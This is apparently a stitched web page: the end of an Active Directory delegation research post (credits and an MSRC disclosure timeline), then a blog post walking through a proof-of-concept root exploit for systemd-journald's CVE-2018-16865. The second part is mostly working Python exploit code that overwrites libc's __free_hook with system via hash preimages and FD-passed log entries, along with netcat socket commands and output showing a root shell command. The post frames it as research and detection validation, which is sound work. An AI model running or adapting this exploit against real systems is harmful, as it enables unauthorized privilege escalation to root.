Benjamin Delpy (@gentilkiwi) for modifying Kekeo and Mimikatz to support this research. And OJ Reeves (@TheColonial) for the introduction.
Kevin Robertson (@NetSPI) for Powermad.
Microsoft for always coming up with great ideas, and never disappointing.
Disclosure Timeline
26/10/2018 - Sent initial report to MSRC.
27/10/2018 - MSRC Case 48231 was opened and a case manager was assigned.
01/11/2018 - Sent an email to MSRC to let them know this behaviour actually conforms with the specification, but I believe it is still a security issue.
09/11/2018 - Sent an email to MSRC requesting an update on this case.
14/11/2018 - MSRC responded that they are still trying to replicate the issue.
27/11/2018 - Sent an email to MSRC providing a 60-day notice to public disclosure.
09/12/2018 - Sent a reminder email to MSRC.
11/12/2018 - MSRC responded that a new case manager was assigned and the following conclusion was reached: "The engineering team has determined this is not an issue which will be addressed via a security update but rather we need to update our documentation to highlight service configuration best practices and using a number of features such as group managed service accounts, resource based constrained delegation, dynamic access control, authentication policies, and ensuring unconstrained delegation is not enabled. 
The team is actively working on the documentation right now with the goal of having it published prior to your disclosure date."
28/01/2019 - Public disclosure
I would like to note that my first experience with MSRC was very disappointing. The lack of dialogue was discouraging and not at all what I had expected.
This post was also published on eladshamir.com.
Source: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
-
Exploiting systemd-journald Part 1
January 29, 2019
By Nick Gregory
Introduction
This is part one in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were:
a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865)
a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866)
The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow user-generated log data to manipulate memory such that an attacker can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allows for privilege escalation to root on the target system.
As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys' initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community.
As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had a chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions). 
As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication's analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture we assume for this post is Ubuntu x86_64, so to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image.
Proof-of-Concept Attack Vector
Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project's own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don't provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch. To dive deeper into how our exploit works, we need to first understand how journald clients communicate with the daemon. So let's get started!
Interacting with systemd-journald
There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald's service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journal/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside.
Syslog Interface
The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren't built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. 
added by syslog, see manpage syslog(3)) and then saved. A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl:
$ echo 'Test Message!' | nc -Uu /dev/log
$ journalctl --user -n 1
...
Jan 23 17:23:47 localhost nc[3646]: Test Message!
Journald-Native Interface
The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed by the UNIX datagram socket at /run/systemd/journal/socket. The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple key/value store, which allows clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a little-endian uint64, the contents of the blob, and a final newline, like so:
SOME_KEY
\x0a\x00\x00\x00\x00\x00\x00\x00SOME_VALUE
The native socket can also accept these entries in two different ways:
by directly sending data over the socket
by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket
Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes into play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald's self-imposed 768MB limit (defined by DATA_SIZE_MAX).
Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors:
normal file descriptors (see manpage fcntl(2))
sealed memfds (see manpage memfd_create(2))
Luckily, we don't need to bother with sealed file descriptors for reasons that we'll get to in a future post. 
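Both mechanics just described — the native entry framing and the FD-passing trick — are easy to reproduce in Python. Below is a self-contained sketch; the helper names (encode_entry, send_fd, recv_fd) are ours, and a local socketpair stands in for journald's real socket, since the SCM_RIGHTS mechanism is identical:

```python
import array
import os
import socket
import struct
import tempfile

def encode_entry(key, value):
    # binary-blob form: KEY \n <little-endian uint64 size> <bytes> \n
    if b"\n" in value:
        return key + b"\n" + struct.pack("<Q", len(value)) + value + b"\n"
    # simple form: KEY=VALUE \n
    return key + b"=" + value + b"\n"

def send_fd(sock, fd):
    # the descriptor rides along as SCM_RIGHTS ancillary data;
    # at least one byte of normal data must accompany it
    sock.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                           array.array("i", [fd]))])

def recv_fd(sock):
    _, ancdata, _, _ = sock.recvmsg(1, socket.CMSG_LEN(4))
    level, ctype, data = ancdata[0]
    assert (level, ctype) == (socket.SOL_SOCKET, socket.SCM_RIGHTS)
    return array.array("i", data)[0]

# "SOME\nVALUE" is 10 bytes, so its size field is \x0a plus seven zero bytes
blob = encode_entry(b"SOME_KEY", b"SOME\nVALUE")

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
with tempfile.TemporaryFile() as f:
    f.write(encode_entry(b"MESSAGE", b"Hello!") + blob)
    f.flush()
    send_fd(a, f.fileno())   # pass the log file's descriptor...
    fd = recv_fd(b)          # ...and receive it on the other end
    os.lseek(fd, 0, os.SEEK_SET)
    received = os.read(fd, 64)
    os.close(fd)
a.close(); b.close()
print(received)
```

In the real exploit the descriptor is sent to /run/systemd/journal/socket instead of a socketpair, letting us smuggle far more data than a single datagram allows.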
Similarly to the syslog interface, you can easily send native messages with nc:
$ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1
...
Jan 23 17:39:40 localhost nc[7154]: Hello!
And to add custom entries:
$ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1 -o json-pretty
{
    "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8
    "__REALTIME_TIMESTAMP" : "1548283220714394",
    "__MONOTONIC_TIMESTAMP" : "95417780424",
    ...
    "MESSAGE" : "Hello!",
    "KEY" : "VALUE",
    ...
}
Exploitation Overview
Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don't have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865.
As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions, of entries. When these entries are appended to the journal, they result in a size of roughly sizeof(EntryItem) * n_entries being allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. 
The actual use of alloca() in the source is wrapped in a macro called newa(), and the code responsible for the vulnerable operation looks like:
items = newa(EntryItem, MAX(1u, n_iovec));
Our general approach for exploiting this vulnerability is to initially send the right size and count of entries so as to make the stack pointer point into libc's BSS memory region, and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control.
To actually exploit this, there are two main issues we need to solve:
Sending all of the entries to journald
Controlling the data written to the stack after it has been lowered into libc
The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald, which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc.
The second issue is a bit more complex, since we don't directly control the data written to the stack after it has been lowered into libc's memory. This is because our entries are hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name). Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which at first presents a seemingly formidable problem. Preimaging a hash can be a daunting task; however, since this is not a cryptographically secure hash, there are some very nice tools we can use to calculate exact preimages in under 30 seconds. We'll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image. 
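To get a feel for the magnitudes involved, here is the distance arithmetic using the non-ASLR addresses precomputed for our Vagrant image (an EntryItem is two uint64 fields, hence the 16-byte size the PoC divides by):

```python
ENTRY_ITEM_SIZE = 16  # sizeof(EntryItem): two little-endian uint64 fields

# Non-ASLR fixed locations for our test image
libc = 0x7ffff79e4000
stack = 0x7fffffffde60
free_hook = libc + 0x3ed8e8  # libc's __free_hook

# alloca() lowers rsp by roughly n_entries * sizeof(EntryItem), so the
# entry count needed to drop the items array onto __free_hook is about:
distance = stack - free_hook
n_entries = distance // ENTRY_ITEM_SIZE
print(hex(distance), n_entries)  # 0x822c578 8531031
```

Roughly 8.5 million 16-byte items — which is why the PoC needs FD passing to deliver hundreds of megabytes of entries; the actual exploit subtracts a handful of entries from this count to account for padding and for entries journald adds itself.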
Proof-of-Concept Code
Here we will begin walking through Python code for our PoC, and a link to the full script can be found at the very end. The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line:
#!/usr/bin/env python3
import array
import os
import socket
import struct

TEMPFILE = '/tmp/systemdown_temp'

def p64(n):
    return struct.pack('<Q', n)

class UNIXSocket(object):
    def __init__(self, path):
        self.path = path

    def __enter__(self):
        self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)
        self.client.connect(self.path)
        return self.client

    def __exit__(self, exc_t, exc_v, traceback):
        self.client.close()
Next we have some constants that may change based on the particular target environment. These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled):
# Non-ASLR fixed locations for our test image
libc = 0x7ffff79e4000
stack = 0x7fffffffde60

# location of the free_hook function pointer to overwrite
free_hook = libc + 0x3ed8e8

# preimage which computes to location of the system function via hash64()
# that location is libc + 0x4f440 in our test image
system_preimage = b"Y=J~-Y',Wj(A"

# padding count to align memory
padding_kvs = 3
Now we have the bulk of the values needed for our proof-of-concept exploit. The first step in the exploit logic is to add some padding entries, which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data (and the functions it calls) further down. This is to align the precise location where data will be written in libc's .BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation. 
with open(TEMPFILE, 'wb') as log:
    msg = b""
    for _ in range(padding_kvs):
        msg += b"P=\n"
Next, we add the preimage value, the hash for which (when computed by hash64()) will be the address of system. Specifically, the alignment of this value will be such that journald writes system into libc's __free_hook, giving us a shell when our command below is freed.
    # msg n is our key that when hashed gives system
    msg += system_preimage + b"\n"
Next, we append our command as a binary data block, surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns:
    # next is our command as a binary data block
    cmd = b"echo $(whoami) > /tmp/pwn"
    # be sure to kill journald afterwards so it doesn't lockup
    cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;"
    # format as a binary data block
    msg += b"C\n"
    msg += p64(len(cmd))
    msg += cmd + b"\n"
As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corruption of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack. 
    # Then we send a large item which breaks the loop
    msg += b"A=" + b"B"*(128*1024*1024) + b"\n"
Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place:
    # Then fill with as many KVs as we need to get to the right addr
    num_msgs = (((stack - free_hook)//16) - 1)
    num_msgs -= 3  # the three above
    num_msgs -= 7  # added by journald itself
    msg += b"B=\n" * num_msgs
    log.write(msg)
At this point, we just need to pass the log FD to journald to get our shell:
with UNIXSocket("/run/systemd/journal/socket") as sock:
    with open(TEMPFILE, 'rb') as log:
        sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [log.fileno()]))])
os.unlink(TEMPFILE)
After running this, we find the file /tmp/pwn has been created with contents "root", meaning we have successfully achieved our privilege escalation.
$ cat /tmp/pwn
root
All Together Now
The full proof-of-concept script that works with ASLR disabled is available here.
Detection
Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities and, when necessary, improve them. Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot Strategy (we call our detection models strategies), and would generally detect most payloads. With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do this all by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn't a good model for detection and prevention.
Source: https://capsule8.com/blog/exploiting-systemd-journald-part-1/